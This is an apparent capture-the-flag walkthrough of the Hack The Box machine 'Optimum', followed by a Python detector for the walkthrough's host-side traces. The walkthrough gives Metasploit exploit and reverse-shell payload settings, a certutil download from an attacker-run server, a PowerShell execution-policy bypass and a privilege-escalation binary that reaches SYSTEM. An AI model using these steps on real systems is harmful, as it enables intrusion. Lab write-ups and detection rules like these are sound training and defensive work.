HTB 7. Optimum
- 1. `nmap -A -T4 -p- 10.10.10.8` reveals only port 80, running httpd 2.3.
- 2. Going to `10.10.10.8` shows it's a file server.
- 3. Search for default credentials (httpd has no default credentials).
- 4. `searchsploit rejetto` (since Rejetto is the vendor of this file server).
- 5. Searching Google for `rejetto hfs 2.3 exploit` reveals a Metasploit remote code execution module and many others.
- 6. Nmap reveals probably an OS that the exploit works on.
- 7. Metasploit: `use exploit/windows/http/rejetto_hfs_exec`, set rhosts, and set payload to `windows/x64/meterpreter/reverse_tcp`.
- 8. `set lhost tun0` instead of typing in the IP (because it's faster).
- 9. `sysinfo` shows x64 on x64 and `getuid` is kostas.
- 10. Attempt priv esc: `getsystem` fails; `background`, then `use post/multi/recon/local_exploit_suggester` (`set session 1`) and `run` reveals nothing.
- 12. Searching Google for `windows 2012 r2 (build 9600) privilege escalation` reveals an exploit-db exploit available that might possibly work.
- 13. Searching `ms16-032` in Metasploit shows there is a module for it. Let's `use` it. Set target to `1`, which is x64. Set `lhost tun0` and `lport 443`. Ran twice; didn't work.
- 14. Manual method: download sherlock above as `sher.ps1`. Start an HTTP server with Python and use certutil (`certutil -urlcache -f http://10.10.14.14/sher.ps1 sher.ps1`) to download the file. Run with `powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"`. Result: 3 potential vulnerabilities.
- 15.
- 16. Run `systeminfo` in a shell on the target and put the output in a text file for `windows-exploit-suggester.py`.
- 17. Run `python ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt`, which detects the MS16-098 exploit; download the exploit from exploit-db.
- 18. `gcc 41020.c ex.exe` fails, so let's download the binary from the link provided on exploit-db.
- 19. Run a Python web server, download to the target, and run with `sh.exe`.
- 20. `whoami` gives us `nt authority\system`.
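The defender-side counterpart to steps 14 and 16: the certutil download and the `-exec bypass` PowerShell launch both leave distinct process-creation events on the host. This is an added example, not part of the write-up; the log lines are constructed and the rule names are my own.

```python
"""Flag the host-side footprints of the walkthrough (certutil used as a
downloader, PowerShell started with execution-policy bypass, a module
imported from a dropped script) in process-creation logs."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample events in key=value form; the quoted cmdline is the tail.
SAMPLE_EVENTS = [
    'host=OPTIMUM user=kostas image=certutil.exe cmdline="certutil -urlcache -f http://10.10.14.14/sher.ps1 sher.ps1"',
    'host=OPTIMUM user=kostas image=powershell.exe cmdline="powershell.exe -exec bypass -Command \\"& {Import-Module .\\sher.ps1; Find-AllVulns}\\""',
    'host=OPTIMUM user=kostas image=cmd.exe cmdline="cmd.exe /c systeminfo"',
    'host=OPTIMUM user=svc_backup image=certutil.exe cmdline="certutil -verify cert.pem"',
]

# Hypothetical rule names; each pattern targets one command shape seen in the steps.
RULES = [
    # certutil fetching over HTTP: living-off-the-land download of a tool or payload
    ("certutil_urlcache_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    # PowerShell launched with the execution policy bypassed
    ("powershell_exec_bypass", re.compile(r"\bpowershell(\.exe)?\b.*-(exec|ep|executionpolicy)\s+bypass\b", re.I)),
    # Module imported from a script sitting in the working directory
    ("import_module_from_cwd", re.compile(r"Import-Module\s+\.\\", re.I)),
]


@dataclass
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


def parse_event(line: str) -> Dict[str, str]:
    """Split a key=value event; cmdline is the quoted tail, so it may hold spaces and quotes."""
    head, _, tail = line.partition(' cmdline="')
    fields = dict(kv.split("=", 1) for kv in head.split())
    fields["cmdline"] = tail[:-1] if tail.endswith('"') else tail
    return fields


def scan(events: List[str]) -> List[Finding]:
    """Return one Finding per (event, rule) match, in event then rule order."""
    findings: List[Finding] = []
    for line in events:
        ev = parse_event(line)
        for name, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                findings.append(Finding(ev["host"], ev["user"], name, ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host} {f.user} {f.rule}: {f.cmdline}")
```

The benign `certutil -verify` event is left alone; only the `-urlcache` fetch with a URL fires, which keeps the rule usable on hosts where certutil is used legitimately.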